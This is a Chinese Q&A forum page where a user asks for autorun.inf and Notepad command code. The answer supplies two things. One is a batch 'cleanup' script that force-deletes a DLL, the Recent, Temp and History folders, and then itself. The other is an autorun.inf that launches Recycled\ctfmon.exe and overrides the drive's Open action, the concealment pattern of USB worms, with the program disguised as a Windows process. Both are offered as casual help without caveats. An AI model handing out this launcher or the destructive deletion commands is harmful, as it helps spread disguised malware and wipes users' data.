记事本,inf文件 的命令 代码

来源:百度知道 编辑:UC知道 时间:2024/05/17 09:53:36
就是像编写自动运行autorun.inf的那些。
我找了很久了,都帮帮忙啦。有用的我再加200。
不只是autorun
还有其他命令吗?

百度搜
安装信息文件

http://blog.csdn.net/gue/archive/2007/03/16/1530875.aspx

给你个清除临时文件的代码吧~~你看看怎么样.

@Title 您的垃圾,正在帮你清理中。。。。。
color 70
cd ..

del c:\winnt\wc98pp.dll del c:\windows\wc98pp.dll

attrib recent -s -h
del recent /f/s/q
attrib recent +s +h

cd Local Settings
del temp /f/s/q
del Tempor~1 /f/s/q
del History /f/s/q

cd..
cd 桌面
del 清理垃圾1.bat

记得保存后将后缀改为bat格式就可以了

[autorun]
shellexecute=Recycled\ctfmon.exe
shell\Open(&0)\command=Recycled\ctfmon.exe
shell=Open(&0)

[autorun]
icon=*.ico
open=*.exe

保存为autorun.inf

和批处理命令差不多

还是自己去学点语言类的专业知识吧